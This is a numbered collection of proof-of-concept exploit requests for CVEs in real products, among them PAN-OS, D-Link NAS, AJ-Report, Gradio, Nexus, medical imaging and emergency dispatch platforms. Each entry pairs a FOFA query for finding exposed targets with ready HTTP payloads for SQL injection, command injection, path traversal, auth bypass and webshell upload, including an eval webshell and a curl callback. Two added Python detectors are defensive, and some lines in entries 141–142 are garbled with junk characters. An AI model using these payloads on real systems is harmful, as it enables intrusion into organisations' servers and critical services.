135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

Entries 137 to 140 are all time-based (SLEEP(5)): a response delayed by about five seconds confirms the injection.

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 q% b: w' Y  ]% z- V2 o
FOFA:body="指挥调度管理平台"
, s' d9 c. `* o9 }POST /app/ext/ajax_users.php HTTP/1.1
& Z- \( {% m; O4 u7 WHost: your-ip
3 R' ]3 t' Q) \: ~: `2 l% FUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: j  G" d0 J2 ~* R$ @
Content-Type: application/x-www-form-urlencoded/ q( ~8 a* l. ~3 [
3 }' }' m1 f- a: F
* `1 p+ {, [6 D- }. G3 I1 X8 |
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -0 A- ?) D$ @( e! y  ]* y8 q
! H* ?' M6 W% f# ?3 g. G

; N* o* a5 m3 @3 L" @9 Q4 `' M142. CMSV6车辆监控平台系统中存在弱密码
9 @% Z: l% U1 `2 H4 E) Q: }CVE-2024-29666% }& Z% l% X; N, h$ S
FOFA:body="/808gps/": G4 a9 p+ j! j, W3 r5 M; y
admin/admin- S' i9 E: O5 t* W) B' C# \
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
CVE-2024-3273
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id); user and passwd are a hardcoded account on the device.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

The traversal in SESSID creates an empty file whose name contains the command; the command runs when the device-telemetry job later processes that directory, so the DNS callback is delayed rather than immediate.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
url=cnRzcDovL2EK is base64 for rtsp://a; transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; and the [S]/[E] markers delimit the command output in the response.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ suffix is the authentication bypass: the login filter whitelists swagger paths by substring match, while Spring strips the path parameter and still routes to /dataSetParam/verification. validationRules is evaluated by a server-side JavaScript engine, which is why java.lang.ProcessBuilder is reachable from it.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same request as entry 149 with a Linux command.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request above only shows unauthenticated access to the endpoint through the same ;swagger-ui/ trick as entries 149 and 150; the injection payload itself is not included in the source.

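Entries 126, 129, 132, 147 and 149 to 151 share one root cause: the access check ran on the request target as received, while the code that served the request normalized it first. Two normalizations matter here, removing .. segments and stripping ;param path parameters (so /a;x/b and /a/b reach the same servlet). The Python below is an added example, not code from this list or from any vendor named in it: it applies both normalizations to a request target, reports what changed, and runs over a constructed sample set built from the request lines in those entries. The flag names and the two benign targets are this example's own choices.

```python
"""Normalize request targets the way the back end will and flag the two
tricks shared by entries 126, 129, 132, 147 and 149-151: '..' segments that
leave the route prefix, and ';param' segments that a path-matching filter
sees but the dispatcher strips."""
from urllib.parse import unquote, urlsplit

# Constructed sample request targets (not taken from a server log).
SAMPLE_TARGETS = [
    "/static/../../../../../etc/passwd",                              # entry 126
    "/pms?module=logging&file_name=../../../../../../../etc/passwd",  # entry 129
    "/pwned?jsp=/app/rest/users;.jsp",                                 # entry 132, CVE-2024-27198
    "/res/../admin/diagnostic.jsp",                                    # entry 132, CVE-2024-27199
    "/webeditor/../../../windows/win.ini",                             # entry 147
    "/dataSetParam/verification;swagger-ui/",                          # entries 149/150
    "/;swagger-ui/dataSource/pageList?pageNumber=1",                   # entry 151
    "/static/css/app.css",                                             # benign
    "/app/rest/users?locator=id:1",                                    # benign
]


def decode_fully(text, rounds=3):
    """Percent-decode until stable so %252e%252e cannot hide a dot segment."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def strip_path_params(path):
    """Drop ';name=value' from every segment, as a servlet container does
    ('/a;x/b' and '/a/b' reach the same handler). Returns (path, stripped?)."""
    segments = path.split("/")
    cleaned = [segment.split(";", 1)[0] for segment in segments]
    return "/".join(cleaned), cleaned != segments


def resolve_dots(path):
    """Resolve '.' and '..' like a file system. Returns
    (normalized path, count of '..' segments, True if '..' climbed above root)."""
    out, dots, above_root = [], 0, False
    for segment in path.replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            dots += 1
            if out:
                out.pop()
            else:
                above_root = True
            continue
        out.append(segment)
    return "/" + "/".join(out), dots, above_root


def analyze_target(target):
    """Return {'normalized': path, 'flags': set} for one request target."""
    parts = urlsplit(target)
    raw_path = decode_fully(parts.path)
    no_params, had_params = strip_path_params(raw_path)
    normalized, dots, above_root = resolve_dots(no_params)
    flags = set()
    if had_params:
        flags.add("path_param")        # ';' inside a path segment
    if dots:
        flags.add("dot_segment")       # clients remove these before sending
    if above_root:
        flags.add("escapes_root")
    # The first segment is what a prefix-matching access rule looked at; if
    # normalization changed it, the rule and the handler disagreed.
    first_raw = (raw_path.split("/") + [""])[1]
    first_norm = normalized.split("/")[1]
    if first_raw and first_raw != first_norm:
        flags.add("prefix_changed")
    # Query values that are paths themselves (entry 129's file_name, entry 132's jsp).
    for pair in (parts.query.split("&") if parts.query else []):
        value = decode_fully(pair.partition("=")[2]).replace("\\", "/")
        if "../" in value:
            flags.add("traversal_in_query")
        if value.startswith("/") and strip_path_params(value)[1]:
            flags.add("path_param_in_query")
    return {"normalized": normalized, "flags": flags}


def suspicious_targets(targets=SAMPLE_TARGETS):
    """Targets that tripped at least one flag, mapped to their flags."""
    results = {target: analyze_target(target)["flags"] for target in targets}
    return {target: flags for target, flags in results.items() if flags}


if __name__ == "__main__":
    for target, flags in suspicious_targets().items():
        print(f"{sorted(flags)}  {target}")
```

Running it prints one line per flagged target. In a WAF or log pipeline the same analyze_target() runs on every request line; dot_segment and path_param are rare enough in legitimate browser traffic to alert on directly, and prefix_changed is the strongest signal because it means the access rule and the handler saw different resources.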
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), <= 7.2.54.8 (LTSF), <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, so the injected command travels in the Basic-auth username.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip
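
Entries 122, 144, 146 and 152 carry their payloads base64-encoded (in a query parameter or in the Basic-auth username), entry 123 hides the quotes and brackets of its OGNL expression behind \uXXXX escapes, and entry 146 additionally percent-encodes its shell metacharacters. A rule that inspects the raw field value sees none of this. The Python below is an added example, not code from this list or from any vendor named in it: it peels percent-encoding, unicode escapes and base64 and matches every intermediate layer. The samples are constructed from the requests in those entries; the flag names, the keyword lists and the benign Basic-auth login are this example's own assumptions.

```python
"""Peel the encodings used in entries 122, 123, 144, 146 and 152 before
matching: percent-encoding, backslash-u escapes and base64 each hide the
payload from a rule that inspects only the raw field value."""
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Constructed samples, not captured traffic: (field, value, percent_encoded).
# Header values are not percent-encoded, so '+' must stay literal in them.
SAMPLES = [
    ("query:sql", "c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=", True),                      # entry 122
    ("form:label", r"\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027"
                   r"\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027", True),  # entry 123
    ("query:system", "aWQ=", True),                                                        # entry 144
    ("query:url", "cnRzcDovL2EK", True),                                                   # entry 146
    ("query:transport", "%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B", True),  # entry 146
    ("header:Authorization", "Basic JztsczsnOmRvZXNub3RtYXR0ZXI=", False),                 # entry 152
    ("header:Authorization", "Basic YWRtaW46UGFzc3cwcmQh", False),                         # made-up benign login
]

UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")
SQL_KW = re.compile(r"\b(select|union|sleep|updatexml|extractvalue|database|version|pg_sleep|benchmark)\b", re.I)
SHELL_META = re.compile(r"[;|`]|\$\(|\$\{|&&")
SHELL_CMD = re.compile(r"^\s*(id|whoami|uname|cat|ls|curl|wget|nc|sh|bash|echo|ipconfig|ifconfig)\b")
OGNL_SINK = re.compile(r"#request|#parameters|findValue|ServletActionContext|ProcessBuilder"
                       r"|freemarker\.template\.utility\.Execute")


def try_base64(text):
    """Decode text as base64 only if it has base64 shape and yields printable UTF-8."""
    candidate = text.strip()
    if not B64_SHAPE.match(candidate):
        return None
    candidate += "=" * (-len(candidate) % 4)          # entry 144 sends passwd unpadded
    try:
        decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return decoded if decoded.strip().isprintable() else None


def decode_layers(value, percent_encoded=True):
    """Return [(layer, text), ...] from the raw value down to the innermost decoding."""
    if value.startswith("Basic "):                    # HTTP Basic: base64 follows the scheme word
        value = value[len("Basic "):]
    layers = [("raw", value)]
    text = value
    if percent_encoded:
        decoded = unquote_plus(text)
        if decoded != text:
            layers.append(("percent", decoded))
            text = decoded
    unescaped = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    if unescaped != text:
        layers.append(("unicode", unescaped))
    for _, layer_text in list(layers):                # base64 may sit at any layer
        inner = try_base64(layer_text)
        if inner is not None:
            layers.append(("base64", inner))
            break
    return layers


def flags_for(value, percent_encoded=True):
    """Match every decoded layer; a hit at any depth is reported."""
    flags = set()
    for _, text in decode_layers(value, percent_encoded):
        if SQL_KW.search(text):
            flags.add("sql")
        if SHELL_META.search(text):
            flags.add("shell_meta")
        if SHELL_CMD.match(text):
            flags.add("shell_command")
        if OGNL_SINK.search(text):
            flags.add("ognl")
    return flags


def scan(samples=SAMPLES):
    """Flagged samples as (field, innermost decoded text, sorted flags)."""
    hits = []
    for field, value, percent_encoded in samples:
        flags = flags_for(value, percent_encoded)
        if flags:
            hits.append((field, decode_layers(value, percent_encoded)[-1][1], sorted(flags)))
    return hits


if __name__ == "__main__":
    for field, decoded, flags in scan():
        print(f"{field:22} {flags}  {decoded!r}")
```

flags_for() is the piece to reuse: feed it each query, form and header value of a request and alert on any non-empty result. The keyword lists are deliberately short; the point is that they only work after the layers are peeled, which is exactly what the raw-value rules these PoCs walk past do not do.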

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file in the Gradio cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based injection in the gsdwid field of the JSON body; PG_SLEEP indicates a PostgreSQL back end.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the path echoed in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php (the server renames the file but keeps the .php extension).

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM (MetaCRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 (Keytop) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
